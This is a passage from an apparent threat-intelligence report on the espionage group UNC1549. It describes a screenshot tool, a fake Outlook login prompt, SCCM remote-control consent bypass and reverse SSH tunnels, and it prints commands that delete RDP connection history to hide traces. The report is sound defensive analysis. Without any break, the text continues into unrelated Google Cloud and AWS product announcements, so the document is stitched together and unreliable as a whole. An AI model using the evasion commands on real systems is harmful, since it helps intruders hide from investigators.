SIGHTGRAB retrieves the current timestamp and uses string interpolation of YYYY-MM-DD-HH-MM on the timestamp to generate the directory name. In this newly created directory, SIGHTGRAB saves all the taken screenshots incrementally.
Figure 6: Examples of screenshot files created by SIGHTGRAB on disk
Mandiant observed UNC1549 strategically deploy SIGHTGRAB on workstations to target users in two categories: those handling sensitive data, allowing for subsequent data exposure and exfiltration, and those with privileged access, enabling privilege escalation and access to restricted systems.
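For illustration, a short Python sketch of the two encoding details described above: decoding API names that are XOR-encoded with the single-byte key 0x41, and building the YYYY-MM-DD-HH-MM directory name used to store screenshots. The encoded sample string is constructed here purely for demonstration.

```python
# Sketch of two SIGHTGRAB details: XOR-0x41 string decoding and the timestamped
# screenshot directory name format.
from datetime import datetime

def xor41_decode(blob: bytes) -> str:
    return bytes(b ^ 0x41 for b in blob).decode(errors="replace")

def screenshot_dir_name(now=None) -> str:
    return (now or datetime.now()).strftime("%Y-%m-%d-%H-%M")

# Example: "GetProcAddress" encoded with XOR 0x41, then decoded back.
encoded = bytes(ord(c) ^ 0x41 for c in "GetProcAddress")
print(xor41_decode(encoded))      # -> GetProcAddress
print(screenshot_dir_name())      # e.g. 2025-11-20-14-07
```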
TRUSTTRAP
TRUSTTRAP is malware that serves a Windows prompt to trick the user into submitting their credentials. The captured credentials are saved in cleartext to a file. Figure 7 shows a sample popup by TRUSTTRAP mimicking the Microsoft Outlook login window.
Figure 7: Screenshot showing the fake Microsoft Outlook login window
TRUSTTRAP has been used by UNC1549 since at least 2023 for obtaining user credentials used for lateral movement.
Reconnaissance and Lateral Movement
For internal reconnaissance, UNC1549 leveraged legitimate tools and publicly available utilities, likely to blend in with standard administrative activities. AD Explorer, a valid executable signed by Microsoft, was used to query Active Directory and inspect its configuration details. Alongside this, the group employed native Windows commands like net user and net group to enumerate specific user accounts and group memberships within the domain, and PowerShell scripts for ping and port scanning reconnaissance on specific subnets, typically those associated with privileged servers or IT administrator workstations.
UNC1549 uses a wide variety of methods for lateral movement, depending on restrictions within the victim environment. Most frequently, RDP was used. Mandiant also observed the use of PowerShell Remoting, Atelier Web Remote Commander (“AWRC”), and SCCM remote control, including execution of variants of SCCMVNC to enable SCCM remote control on systems.
Atelier Web Remote Commander
Atelier Web Remote Commander (AWRC) is a commercial utility for remotely managing, auditing, and supporting Windows systems. Its key distinction is its agentless design, meaning it requires no software installation or pre-configuration on the remote machine, enabling administrators to connect immediately.
Leveraging the capabilities of AWRC, UNC1549 utilized this publicly available commercial tool to facilitate post-compromise activities. These activities included:
Established remote connections: Used AWRC to connect remotely to targeted hosts within the compromised network
Conducted reconnaissance: Employed AWRC’s built-in functions to gather information by:
Enumerating running services
Enumerating active processes
Enumerating existing RDP sessions
Stole credentials: Exploited AWRC to exfiltrate sensitive browser files known to contain stored user credentials from remote systems
Deployed malware: Used AWRC as a vector to transfer and deploy malware onto compromised machines
SCCMVNC
SCCMVNC is a tool designed to leverage the existing Remote Control feature within Microsoft System Center Configuration Manager (SCCM/ConfigMgr) to achieve a VNC-like remote access experience without requiring additional third-party modules or user consent/notifications.
SCCM.exe reconfig /target:[REDACTED]
Figure 8: Example of an UNC1549 executing SCCMVNC command
The core functionality of SCCMVNC lies in its ability to manipulate the existing Remote Control feature of SCCM. Instead of deploying a separate VNC server or other remote access software, the tool directly interacts with and reconfigures the settings of the native SCCM Remote Control service on a client workstation. This approach leverages an already present and trusted component within the enterprise environment.
A key aspect of SCCMVNC is its capacity to bypass the standard consent and notification mechanisms typically associated with SCCM Remote Control. Normally, when an SCCM remote control session is initiated, the end-user is prompted for permission, and various notification icons or connection bars are displayed. SCCMVNC effectively reconfigures the underlying SCCM settings (primarily through WMI interactions) to disable these user-facing requirements. This alteration allows for a significantly more discreet and seamless remote access experience, akin to what one might expect from a VNC connection where the user might not be immediately aware of the ongoing session.
Command and Control
UNC1549 continued to use Microsoft Azure Web Apps registrations and cloud infrastructure for C2. In addition to backdoors including MINIBUS, MINIBIKE, and TWOSTROKE, UNC1549 relied heavily on SSH reverse tunnels established on compromised systems to forward traffic from their C2 servers to compromised systems. This technique limited the availability of host-based artifacts during investigations, since security telemetry would only record network connections. For example, during data collection from SMB shares, outbound connections were observed from the SSH processes to port 445 on remote systems, but the actual data collected could not be confirmed because no staging took place within the victim environment and object auditing was disabled.
Figure 9: Example of an UNC1549 reverse SSH command
Mandiant also identified evidence of UNC1549 deploying a variety of redundant remote access methods, including ZEROTIER and NGROK. In some instances, these alternative methods weren’t used by the threat actor until victim organizations had performed remediation actions, suggesting they are primarily deployed to retain access.
Complete Mission
Espionage
UNC1549’s operations appear strongly motivated by espionage, with mission objectives centering around extensive data collection from targeted networks. The group actively seeks sensitive information, including network/IT documentation, intellectual property, and emails. Furthermore, UNC1549 often leverages compromised organizations as a pivot point, using their access to target other entities, particularly those within the same industry sector, effectively conducting third-party supplier and partner intrusions to further their intelligence-gathering goals.
Notably, Mandiant responded to one intrusion at an organization in an unrelated sector, and assessed that the intrusion was opportunistic due to the initial spear phishing lure being related to a job at an aerospace and defense organization. This demonstrated UNC1549’s ability to commit resources to expanding access and persistence in victim organizations that don’t immediately meet traditional espionage goals.
Defense Evasion
UNC1549 frequently deleted utilities from compromised systems after execution to avoid detection and hinder investigation efforts. The deletion of forensic artifacts, including RDP connection history registry keys, was also observed. Additionally, as described earlier, the group repeatedly used SSH reverse tunnels from victim hosts back to their infrastructure, a technique which helped hide their activity from EDR agents installed on those systems. Combined, this activity demonstrated an increase in the operational security of UNC1549 over the past year.
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
Figure 10: Examples of UNC1549 commands to delete RDP connection history registry keys
Acknowledgement
This analysis would not have been possible without the assistance from across Google Threat Intelligence Group, Mandiant Consulting and FLARE. We would like to specifically thank Greg Sinclair and Mustafa Nasser from FLARE, and Melissa Derr, Liam Smith, Chris Eastwood, Alex Pietz, Ross Inman, and Emeka Agu from Mandiant Consulting.
MITRE ATT&CK
| Tactic | ID | Name | Description |
| --- | --- | --- | --- |
| Collection | T1213.002 | Data from Information Repositories: SharePoint | UNC1549 browsed Microsoft Teams and SharePoint to download files used for extortion. |
| Collection | T1113 | Screen Capture | UNC1549 was observed taking screenshots of sensitive data. |
| Reconnaissance | T1598.003 | Phishing for Information | UNC1549 used third-party vendor accounts to obtain privileged accounts using a password reset portal theme. |
| Credential Access | T1110.003 | Brute Force: Password Spraying | UNC1549 was observed performing password spray attacks against the domain. |
| Credential Access | T1003.006 | OS Credential Dumping: DCSync | UNC1549 was observed using DCSYNCER.SLICK to perform DCSync attacks against domain controllers. |
| Defense Evasion | T1574.001 | Hijack Execution Flow: DLL Search Order Hijacking | UNC1549 was observed using search order hijacking to execute both LIGHTRAIL and DCSYNCER.SLICK. |
| Initial Access | T1078 | Valid Accounts | UNC1549 used valid compromised accounts to gain initial access. |
| Initial Access | T1199 | Trusted Relationship | UNC1549 used trusted third-party vendor accounts for both initial access and lateral movement. |
Google SecOps customers receive robust detection for UNC1549 TTPs through curated threat intelligence from Mandiant and Google Threat Intelligence. This frontline intelligence is operationalized within the platform as custom detection signatures and advanced YARA-L rules.
We’re excited to launch the Production-Ready AI with Google Cloud Learning Path, a free series designed to take your AI projects from prototype to production.
This page is the central hub for the curriculum. We’ll be updating it weekly with new modules from now through mid-December.
Why We Built This: Bridging the Prototype-to-Production Gap
Generative AI makes it easy to build an impressive prototype. But moving from that proof-of-concept to a secure, scalable, and observable production system is where many projects stall. This is the prototype-to-production gap. It’s the challenge of answering hard questions about security, infrastructure, and monitoring for a system that now includes a probabilistic model.
It’s a journey we’ve been on with our own teams at Google Cloud. To solve for this ongoing challenge, we built a comprehensive internal playbook focused on production-grade best practices. After seeing the playbook’s success, we knew we had to share it.
We’re excited to share this curriculum with the developer community. Share your progress and connect with others on the journey using the hashtag #ProductionReadyAI. Happy learning!
The Curriculum
Module 1: Developing Apps that use LLMs
Start with the fundamentals of building applications and interacting with models using the Vertex AI SDK.
The landscape of generative AI is shifting. While proprietary APIs are powerful, there is a growing demand for open models—models where the architecture and weights are publicly available. This shift puts control back in the hands of developers, offering transparency, data privacy, and the ability to fine-tune for specific use cases.
To help you navigate this landscape, we are releasing two new hands-on labs featuring Gemma 3, Google’s latest family of lightweight, state-of-the-art open models.
Why Gemma?
Built from the same research and technology as Gemini, Gemma models are designed for responsible AI development. Gemma 3 is particularly exciting because it offers multimodal capabilities (text and image) and fits efficiently on smaller hardware footprints while delivering massive performance.
But running a model on your laptop is very different from running it in production. You need scale, reliability, and hardware acceleration (GPUs). The question is: Where should you deploy?
Path 1: The Serverless Approach (Cloud Run)
Best for: Developers who want an API up and running instantly without managing infrastructure, scaling to zero when not in use.
If your priority is simplicity and cost-efficiency for stateless workloads, Cloud Run is your answer. It abstracts away the server management entirely. With the recent addition of GPU support on Cloud Run, you can now serve modern LLMs without provisioning a cluster.
Path 2: The Platform Approach (GKE)
Best for: Engineering teams building complex AI platforms, requiring high throughput, custom orchestration, or integration with a broader microservices ecosystem.
When your application graduates from a prototype to a high-traffic production system, you need the control of Kubernetes. GKE Autopilot gives you that power while still handling the heavy lifting of node management. This path creates a seamless journey from local testing to cloud production.
Which Path Will You Choose?
Whether you are looking for the serverless simplicity of Cloud Run or the robust orchestration of GKE, Google Cloud provides the tools to take Gemma 3 from a concept to a deployed application.
AWS Transform for VMware now allows customers to automatically generate network configurations that can be directly imported into the Landing Zone Accelerator on AWS solution (LZA). Building on AWS Transform’s existing support for infrastructure-as-code generation in AWS CloudFormation, AWS CDK, and Terraform formats, this new capability specifically enables automatic transformation of VMware network environments into LZA-compatible network configuration YAML files. These YAML configurations can be directly deployed through LZA’s deployment pipeline, streamlining the process of setting up your cloud infrastructure.
AWS Transform for VMware is an agentic AI service that automates the discovery, planning, and migration of VMware workloads, accelerating infrastructure modernization with increased speed and confidence. Landing Zone Accelerator on AWS solution (LZA) automates the setup of a secure, multi-account AWS environment using AWS best practices. Migrating workloads to AWS traditionally requires you to manually recreate network configurations while maintaining operational and compliance consistency. The service now automates the generation of LZA network configurations, reducing manual effort, potential configuration errors, and deployment time while ensuring compliance with enterprise security standards.
AWS Marketplace now displays estimated tax information and the invoicing entity to buyers at the time of purchase. This new capability helps customers understand the total cost of their AWS Marketplace purchases before completing transactions, providing enhanced transparency for procurement approvals and budgeting.
When reviewing offers in AWS Marketplace, customers can now see estimated tax amounts, tax rates, and the invoicing entity based on their current tax and address settings in the AWS Billing console. This information appears at the time of procurement and can be downloaded as a PDF, allowing buyers to request approval for the correct spend amount and issue purchase orders to the appropriate invoicing entity. The estimated tax display includes the tax type (such as Value Added Tax, Goods and Services Tax, or US sales tax), estimated tax amount for upfront charges, and tax rate information. This visibility helps finance teams accurately budget and avoid unexpected costs that can impact procurement workflows and payment processing.
This capability is available today in all AWS Regions where AWS Marketplace is supported.
For information on managing your tax settings, refer to the AWS Billing Documentation. To learn more about tax handling in AWS Marketplace, visit this page.
Starting today, Amazon EC2 High Memory U7i instances with 24TB of memory (u7in-24tb.224xlarge) are now available in the US East (Ohio) region. U7in-24tb instances are part of AWS 7th generation and are powered by custom fourth generation Intel Xeon Scalable Processors (Sapphire Rapids). U7in-24tb instances offer 24TB of DDR5 memory, enabling customers to scale transaction processing throughput in a fast-growing data environment.
U7in-24tb instances offer 896 vCPUs, support up to 100Gbps of Amazon Elastic Block Store (EBS) bandwidth for faster data loading and backups, deliver up to 200Gbps of network bandwidth, and support ENA Express. U7i instances are ideal for customers using mission-critical in-memory databases like SAP HANA, Oracle, and SQL Server.
Today, AWS launched the ability for Amazon VPC IP Address Manager (IPAM) to automatically acquire non-overlapping IP address allocations from Infoblox Universal IPAM. This feature minimizes manual processes between cloud and on-premises administrators, reducing the turnaround time.
With this launch, you can automatically acquire non-overlapping IP addresses from your on-premises Infoblox Universal IPAM into your top-level AWS IPAM pool and organize them into regional pools based on your business requirements. When you acquire non-overlapping IPs, you reduce the risk of service disruptions because your IPs don’t conflict with on-premises IP addresses. Previously, in hybrid cloud environments, administrators had to use offline means such as tickets or emails to request and allocate IP addresses, which was often error-prone and time-consuming. This integration automates the manual process, improving operational efficiency.
This feature is available in all AWS Regions where Amazon VPC IPAM is supported, excluding AWS China Regions and AWS GovCloud (US) Regions.
Starting today, Amazon Aurora MySQL-Compatible Edition 3 (with MySQL 8.0 compatibility) will support MySQL 8.0.43 through Aurora MySQL v3.11.
In addition to several security enhancements and bug fixes, MySQL 8.0.43 includes additional error messages for Group Replication and introduces the mysql client “commands” option, which enables or disables most mysql client commands. For more details, refer to the Aurora MySQL 3.11 and MySQL 8.0.43 release notes. To upgrade to Aurora MySQL 3.11, you can initiate a minor version upgrade manually by modifying your DB cluster, or you can enable the “Auto minor version upgrade” option when creating or modifying a DB cluster. This release is available in all AWS Regions where Aurora MySQL is available.
Amazon Aurora is designed for unparalleled high performance and availability at global scale with full MySQL and PostgreSQL compatibility. It provides built-in security, continuous backups, serverless compute, up to 15 read replicas, automated multi-Region replication, and integrations with other AWS services. To get started with Amazon Aurora, take a look at our getting started page.
Amazon Relational Database Service (Amazon RDS) for MySQL now supports MySQL minor versions 8.0.44 and 8.4.7, the latest minors released by the MySQL community. We recommend upgrading to the newer minor versions to fix known security vulnerabilities in prior versions of MySQL and to benefit from bug fixes, performance improvements, and new functionality added by the MySQL community. Learn more about the enhancements in RDS for MySQL 8.0.44 and 8.4.7 in the Amazon RDS user guide.
You can leverage automatic minor version upgrades to automatically upgrade your databases to more recent minor versions during scheduled maintenance windows. You can also use Amazon RDS Managed Blue/Green deployments for safer, simpler, and faster updates to your MySQL instances. Learn more about upgrading your database instances, including automatic minor version upgrades and Blue/Green Deployments, in the Amazon RDS User Guide.
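As a minimal sketch, assuming boto3 and a placeholder instance identifier, an in-place minor version upgrade to 8.0.44 (deferred to the next maintenance window) might look like the following:

```python
# Minimal sketch (boto3): upgrade an RDS for MySQL instance to minor version 8.0.44
# during the next maintenance window and opt in to automatic minor version upgrades.
# The instance identifier is a placeholder.
import boto3

rds = boto3.client("rds")
rds.modify_db_instance(
    DBInstanceIdentifier="my-mysql-instance",  # placeholder
    EngineVersion="8.0.44",
    AutoMinorVersionUpgrade=True,
    ApplyImmediately=False,                    # defer to the maintenance window
)
```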
Amazon RDS for MySQL makes it simple to set up, operate, and scale MySQL deployments in the cloud. Learn more about pricing details and regional availability at Amazon RDS for MySQL. Create or update a fully managed Amazon RDS for MySQL database in the Amazon RDS Management Console.
AWS Lambda announces Provisioned Mode for event source mappings (ESMs) that subscribe to Amazon SQS, a feature that allows you to optimize the throughput of your SQS ESM by provisioning event polling resources that remain ready to handle sudden spikes in traffic. An SQS ESM configured with Provisioned Mode scales 3x faster (up to 1,000 concurrent executions per minute) and supports 16x higher concurrency (up to 20,000 concurrent executions) than the default SQS ESM capability. This allows you to build highly responsive and scalable event-driven applications with stringent performance requirements.
Customers use SQS as an event source for Lambda functions to build mission-critical applications using Lambda’s fully-managed SQS ESM, which automatically scales polling resources in response to events. However, for applications that need to handle unpredictable bursts of traffic, lack of control over the throughput of ESM can lead to delays in event processing. Provisioned Mode for SQS ESM allows you to fine tune the throughput of the ESM by provisioning a minimum and maximum number of polling resources called event pollers that are ready to handle sudden spikes in traffic. With this feature, you can process events with lower latency, handle sudden traffic spikes more effectively, and maintain precise control over your event processing resources.
This feature is generally available in all AWS Commercial Regions. You can activate Provisioned Mode for SQS ESM by configuring a minimum and maximum number of event pollers in the ESM API, AWS Console, AWS CLI, AWS SDK, AWS CloudFormation, and AWS SAM. You pay for the usage of event pollers, measured in a billing unit called the Event Poller Unit (EPU). To learn more, read the Lambda ESM documentation and AWS Lambda pricing.
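As a minimal sketch, assuming boto3 and placeholder values, configuring minimum and maximum event pollers on an existing SQS event source mapping might look like the following; the ProvisionedPollerConfig field mirrors the ESM API's provisioned poller configuration and is worth confirming against the current documentation.

```python
# Minimal sketch (boto3): enable Provisioned Mode on an SQS event source mapping
# by setting minimum and maximum event pollers. UUID and poller counts are placeholders.
import boto3

lambda_client = boto3.client("lambda")
lambda_client.update_event_source_mapping(
    UUID="a1b2c3d4-5678-90ab-cdef-EXAMPLE11111",   # placeholder ESM UUID
    ProvisionedPollerConfig={
        "MinimumPollers": 5,      # baseline capacity kept warm
        "MaximumPollers": 200,    # ceiling for burst handling
    },
)
```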